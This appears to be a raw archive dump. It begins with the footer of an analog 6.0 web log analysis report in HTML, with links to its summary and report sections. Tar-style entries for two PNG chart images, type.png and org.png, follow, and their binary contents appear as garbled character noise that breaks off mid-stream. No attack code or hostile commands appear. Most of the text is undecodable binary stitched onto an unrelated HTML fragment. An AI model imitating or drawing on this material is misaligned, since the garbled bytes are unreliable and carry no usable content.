class="xl">[not listed: 36 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> type.png 0000644 00000005434 15114762025 0006244 0 ustar 00 �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� �IDATx���Kr�8`��zT�N�u�v�0���h�x��� �72�08�VT[,JE}F�H���_�)��b��ބ~rc���zzɯW���0� 뷤��� � �B��!,D�B��!,D�B��!,D�B��!,D�Bd??l[��,�O��e f3��/��*?�M���7bI�|>}�����G�,��b��G�,��|f���5�K�V��-���X\>�E,U�'n�AbyV���QK�%|� ����(,�����ꋂ������>d�B`M5�z��X�X#V"��8M별5`%B��4�x{P�� �5ܡK.VnӪ`�ږ^��/�+���� mk��j�ʖ�K!kmX~V� m�R�k�����PX��a���^�+;!,���<,.�ƖT�6ݤ�S�vI�Xܷr�֭�Um[��M>B��i�%�c�Uk[ ,��'�D=�PK�h~dE��!�R�i,ss��Y�m���X�B�a�2Ve!�\��� ^�1eڹi��]��l�z���~jXq��c 3YS�Jt,<�0�5�D�M�5�dM+9��O � �X�J���X��˱����wt�X���mX�:,a�]-���F�V8 %�L�r�+���c�;��_��u�x�Ģ�S���&�l!G��� ��{a�4K�AfzK��.� �/��*`�piZ�\� �НW�G�0�Fm��22b������V~`���� ��s�jd��酙�:E�2��Z���ZQ�w^��R.vĕ��יi K$�P8X�R��[eX��MX�:\�TK�~��?�����m��w�7����kiZ����F� �K��.��Q�A[X�*\����t�<��au?Q�듰X� 禅��3X��� +5���zD��r7Ŝ�e.���ݞ4V� 禅�J�a��Ao���4Vu`m�J�o��8K��岲>��U� +Q����Z��93�|�g����5��e����cZ�F��i9Xb�Q���d`�:Db�Ck�2�T���K��Ϻk�$m��(��X��a�L�:��"),P�ڈ�4����+��X�*܈֡~�����ف���T�ԏE���B�K�=��v��� �?T��?i\��r�i����em� �V+��DXх�m`=� �91X�(���FΧ -K����J�:�u�p/H����QvIp��X���4� K� �tk;��hb�D�� 1����N{��=WK]�h;X��X�)Z��9�H���Ռ%�vv�%�1� 7bu�`� ~��f�d���,���2t��GO���z�_T�{���g��'����<j9[w�\���˰PS3��V�/vV.�ں�2���م���EX�$�B�n��wJkփ�+��X�;���g��證�0�]5-<���W��H��4�5���Bd'��X,s~��������N�2s,M���f8�e��v��0�<����%Z�\����P,����q����� �!�����e'VO!,D��X�"�T�cq�Fa����}��34��۟F#+Gr���?�wd�I6�EX�"��a!BX�"��a!BX�"��a!�Es?����!,D��<�ӱ�}3$,L�����Xݶ,��d?֟a�!,D��d�~� ��/��o&��H��؝��q�",L�B$�p�gbu��ӿ��D��aaBX�"�ϰ����s�|��iX],��$��N�����B���|��IX}���njb���EX��>��Ϋ0��ۈ���|`&9,D��z��,bh��zX��I^�P��0�ZP��aa���!��*,`�����EX���u�� KXС�``��C�5��2�&?9 ���a 1��X����cհ@��c`&e,P�ƨ�dhձ�x+dU,�bk�"�c ��5H��X��w���X�t, V�kU��X �jת` ӱ@X�B,c�S� �Z!�*BV�KXo!��JXCY���m��5R�bP�b��c հ�Զ�Xc5,�*��,�hV`�B��a ְ+߶2X�5,��b���Ic������$�x5�pX�JLa X������m�dX��D�5&��C,9d�R�b%J��z�jVT��p�8n6`��@�`�A;���).�?ߡu6b)���5��Rٌ��O$���!=z����ۖ����!,D�B��!,D�B��!,D��3Y��������lP?��"����������5)�m��>@������wEb#ZHX��FVk�=�ܦ/��څӟ� RcLK�ͮ��sV�k�/p��^hh�5 �d����ִ�v���f�pW�� 3���u�l�|~*����A�k2}�|,�dN[���s���r�`W���,���M=�;�3�R�\�cGV�TY,�zm�b�������;���%�#�gsGVky����k�_��[�lK����]��=��>���Vs`i,�\�ҳ���5�}`v��9r�|\��f�T������M�Z��}Ki&��2���7��Q��J&�.����!�cCD�B��!,D�B��!,D�B��!,D�B�`I ( ��+�ۄu�z#z��WF������3�3�� IEND�B`� org.png 0000644 00000006764 15114762025 0006061 0 ustar 00 �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� �IDATx��?r�Ɖ��.{vU��L��U:�(���h�u6�Nf���X��+��w1���<���G4�U�j[���@4v?}iB�s��ڇ��u_~��1lE��ݗf-��X_xJG��b ^ V��5Xj�2�`e���P���+C V��5Xj�2�`e���P���+C V���bŎ��V�b�`~�##�Ű8�;J�8�>�a�O��6���S��Z��LXջk,vw<�w�L+�Y9���b.,Ə�(,��3�U� ˉ`��C�Q̃�F�u���g��"�p�����X,�*�ʺ�+�AV�I�� f��{z<��_\hX�F`=D,�@�!Z�UD,,�U�cm�������=IZ����q��\B8X`���- KY�vE�� ��4*D�YU�����J�-�@�v��)X ���L+u ��X�wV�`%a%˖��x��!�:<JѪY��a�C������~V"�AX;V"�V���0B�x��u��NO�`�W V�ba`U3X����X!XN ��I�J�����8,��|Xn � b�X(X�X���Ʈ���t��+�(�tS����x ��g��؉��"��!S�|X�������5��iu(Lt���,LQ������i[��^r����XX Q�<�5X�"` c=CUˀ%28�k5k3�p��&���Zˀ�O~r�'#�XiX{���v7�K!F�B��s��Pk�La �B0���aMݫ�-����rg+!�e���h�I�ܰ����p;aaS�rS��w�6#�XqX��*�VaXn �7��(,�X��! o,�.b�����|�-���r����z�?:`�Sh�:E�̡���,���0V�k���4�^]�뵛*k7V���<�(+#�0,�X��,�S�XX��h�V�XX��ha�,V�X�W� ,X[l s�e�2K���ճ���ƳnV(��,� ��J��F<���W?�ҙ`�%Y5X���R�ꃕU���|c��EkC*�1�̪6Xy)��Yy9�/���g�Ba�@c�b��9Y�Cj��s�r�e���2�d�O�i� ��+Y3�d,��W�4�ށ��}�zX�QV0,{~������څ�岊�br��<.Y��yˇ�Y�<X�qVnѲ`u��Tk�u �g�����+3�.��+7���5�Т??k!�]�XAV �yNֆ�g��œ�`g͢�'�R�N~V�:,k�fU���p��s����VYX{���+ª�:�Ɗ�r`}��'�T���`�,c�YكT��ߐ�J��#Xq��o ,�B�R�N��"� � �������qV� S}���n�N`5���b���t���ngX{���I3������l�+�T1X��tU��M���7��"�v��<V��b��Y�U ��g����,�*����R!R.�-��G�U8~ � k'B�Q�j�v����n�i0G���zY!L��.��"��<�Q��b� Y� ���4,�E`!㗂��p�Gh���h4,�7�t��5=��pc�SX �q��{y���c��oV�ل��%f�\��3U ց��^�ſ����� �b���ˋe�(�[�u�?��� 3���������ev��]��?>~~�V�\3�+��*����Z��G�iX�_k��Y�qX?>k�}R��Y�mXC?����H+e.���^�����"�3�D/�<